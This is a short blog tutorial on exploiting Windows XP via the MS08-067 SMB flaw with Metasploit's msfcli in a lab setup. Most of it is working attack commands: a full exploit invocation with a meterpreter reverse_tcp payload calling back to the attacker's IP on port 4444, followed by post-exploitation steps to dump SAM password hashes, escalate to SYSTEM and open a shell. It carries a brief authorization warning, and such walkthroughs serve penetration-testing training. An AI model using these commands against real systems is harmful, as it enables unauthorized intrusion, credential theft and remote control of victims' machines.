exploit using metasploit msfcli

How to exploit using msfcli ?

Metasploit exploit using msfcli command line interface.

Warning : don’t try this on any public, corporate or unauthorized networks . Performed only when you have authorization to do.

Exploit attempt using the metasploit framework can be made using different approaches like : msfcli , msfconsole , shell scripting & resource scripting

How to exploit using msfcli ?

Help for msfcli command line usage

#msfcli -h

With our guide we are going to use windows XP as our target (victim).

Lab – Setup

Target:
Target(victim) : 192.168.1.245
OS in target : Windows XP
Exploit : ms08-067
Port : 445

Attacker
Attacker : 192.168.0.252
OS in attacker : Kali Linux
Exploit framework : Metasploit
Exploit method : msfcli

msfcli usage :

Exploit module:
#msfcli exploitname payload=windows/meterpreter/reverse_tcp lhost=IP E

Scanner module:
#msfcli auxilary/scanner/http/http_version rhosts=IP E

Note : Option “E” for module execution

The location of modules in Kali Linux
/usr/share/metasploit-framework/modules/exploits/windows/

Let’s make a exploit attempt on target PC .

Step 1:

#msfcli exploit/windows/smb/ms08_067_netapi PYALOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.252 LPORT=4444 RHOST=192.168.1.245 E

Note:
LHOST = localhost IP(attacker)
LPORT= 4444, binding port to get the reverse_shell on attacker PC
RHOST= 192.168.1.245 ,target IP address(victim)

E = Execute

Step 2:

Once the meterpreter session established, proceed for post exploitation.

The help command to know the usage of command during the post exploitation, information gather or privilege escalation.

meterpreter > help

Get the passwords from SAM database
meterpreter > hasdump

Privilege escalation to system account
meterpreter >getsystem

Get into the shell of target PC
meterpreter >shell

Watch , exploit using metasploit msfcli

Both comments and pings are currently closed.

Comments are closed.

Copyright ©Solutions@Experts.com
Copyright © NewWpThemes Techmark Solutions - www.techmarksolutions.co.uk